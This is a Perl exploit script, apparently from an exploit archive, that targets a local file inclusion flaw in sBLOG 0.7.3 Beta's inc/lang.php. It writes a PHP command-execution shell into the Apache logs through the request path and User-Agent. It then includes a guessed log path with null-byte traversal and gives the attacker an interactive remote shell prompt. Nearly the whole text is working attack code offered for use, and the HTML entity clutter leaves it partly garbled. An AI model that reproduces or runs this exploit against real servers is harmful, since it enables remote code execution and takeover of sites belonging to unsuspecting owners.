sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit

                                                #!/usr/bin/perl
# sBLOG 0.7.3 Beta(inc/lang.php)Local File Inclusion Exploit
# D.Script: http://sourceforge.net/projects/sblog/
# V.Code:
# if(isset($conf_lang_default) && file_exists(\'lang/\' . $conf_lang_default . \'.php\'))
#	 require(\'lang/\' . $conf_lang_default . \'.php\');
# Discovered & Coded by : GolD_M = [Mahmood_ali]
# Contact:[email protected]
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay\'s Group
# Thanx : w4ck1ng.com & cyb3rt & 020

use IO::Socket;
use LWP::Simple;

#ripped

@apache=(
\"../../../../../var/log/httpd/access_log\",
\"../../../../../var/log/httpd/error_log\",
\"../apache/logs/error.log\",
\"../apache/logs/access.log\",
\"../../apache/logs/error.log\",
\"../../apache/logs/access.log\",
\"../../../apache/logs/error.log\",
\"../../../apache/logs/access.log\",
\"../../../../apache/logs/error.log\",
\"../../../../apache/logs/access.log\",
\"../../../../../apache/logs/error.log\",
\"../../../../../apache/logs/access.log\",
\"../logs/error.log\",
\"../logs/access.log\",
\"../../logs/error.log\",
\"../../logs/access.log\",
\"../../../logs/error.log\",
\"../../../logs/access.log\",
\"../../../../logs/error.log\",
\"../../../../logs/access.log\",
\"../../../../../logs/error.log\",
\"../../../../../logs/access.log\",
\"../../../../../etc/httpd/logs/access_log\",
\"../../../../../etc/httpd/logs/access.log\",
\"../../../../../etc/httpd/logs/error_log\",
\"../../../../../etc/httpd/logs/error.log\",
\"../../.. /../../var/www/logs/access_log\",
\"../../../../../var/www/logs/access.log\",
\"../../../../../usr/local/apache/logs/access_log\",
\"../../../../../usr/local/apache/logs/access.log\",
\"../../../../../var/log/apache/access_log\",
\"../../../../../var/log/apache/access.log\",
\"../../../../../var/log/access_log\",
\"../../../../../var/www/logs/error_log\",
\"../../../../../var/www/logs/error.log\",
\"../../../../../usr/local/apache/logs/error_log\",
\"../../../../../usr/local/apache/logs/error.log\",
\"../../../../../var/log/apache/error_log\",
\"../../../../../var/log/apache/error.log\",
\"../../../../../var/log/access_log\",
\"../../../../../var/log/error_log\"
);

if&nbsp;(@ARGV&nbsp;<&nbsp;3)&nbsp;{
print&nbsp;\"
===============================================================
#&nbsp;sBLOG&nbsp;0.7.3&nbsp;Beta(inc/lang.php)Local&nbsp;File&nbsp;Inclusion&nbsp;Exploit&nbsp;&nbsp;#
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Gold.pl&nbsp;[Victim]&nbsp;/&nbsp;(apachepath)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Ex:&nbsp;Gold.pl&nbsp;[Victim]&nbsp;/&nbsp;../logs/error.log&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#
===============================================================
#&nbsp;Greetz&nbsp;To:&nbsp;Tryag-Team&nbsp;&&nbsp;4lKaSrGoLd3n-Team&nbsp;&&nbsp;AsbMay\'s&nbsp;Group&nbsp;&nbsp;#
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Thanx&nbsp;:&nbsp;w4ck1ng.com&nbsp;&&nbsp;cyb3rt&nbsp;&&nbsp;020&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#
===============================================================
\";
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print&nbsp;\"Code&nbsp;is&nbsp;injecting&nbsp;in&nbsp;logfiles...
\";
$CODE=\"<?php&nbsp;ob_clean();system($HTTP_COOKIE_VARS[cmd]);die;?>\";
$socket&nbsp;=&nbsp;IO::Socket::INET->new(Proto=>\"tcp\",&nbsp;PeerAddr=>\"$host\",&nbsp;PeerPort=>\"80\")&nbsp;or&nbsp;die&nbsp;\"Connection&nbsp;failed.

\";
print&nbsp;$socket&nbsp;\"GET&nbsp;\".$path.$CODE.\"&nbsp;HTTP/1.1
\";
print&nbsp;$socket&nbsp;\"user-Agent:&nbsp;\".$CODE.\"
\";
print&nbsp;$socket&nbsp;\"Host:&nbsp;\".$host.\"
\";
print&nbsp;$socket&nbsp;\"Connection:&nbsp;close

\";
close($socket);
print&nbsp;\"Write&nbsp;END&nbsp;to&nbsp;exit!
\";
print&nbsp;\"If&nbsp;not&nbsp;working&nbsp;try&nbsp;another&nbsp;apache&nbsp;path

\";

print&nbsp;\"[shell]&nbsp;\";$cmd&nbsp;=&nbsp;<STDIN>;

while($cmd&nbsp;!~&nbsp;\"END\")&nbsp;{
$socket&nbsp;=&nbsp;IO::Socket::INET->new(Proto=>\"tcp\",&nbsp;PeerAddr=>\"$host\",&nbsp;PeerPort=>\"80\")&nbsp;or&nbsp;die&nbsp;\"Connection&nbsp;failed.

\";

#now&nbsp;include&nbsp;parameter

print&nbsp;$socket&nbsp;\"GET&nbsp;\".$path.\"/inc/lang.php?conf_lang_default=\".$apache[$apachepath].\"%00&cmd=$cmd&nbsp;HTTP/1.1
\";
print&nbsp;$socket&nbsp;\"Host:&nbsp;\".$host.\"
\";
print&nbsp;$socket&nbsp;\"Accept:&nbsp;*/*
\";
print&nbsp;$socket&nbsp;\"Connection:&nbsp;close

\";

while&nbsp;($raspuns&nbsp;=&nbsp;<$socket>)
{

print&nbsp;$raspuns;
}

print&nbsp;\"[shell]&nbsp;\";
$cmd&nbsp;=&nbsp;<STDIN>;
}

&nbsp;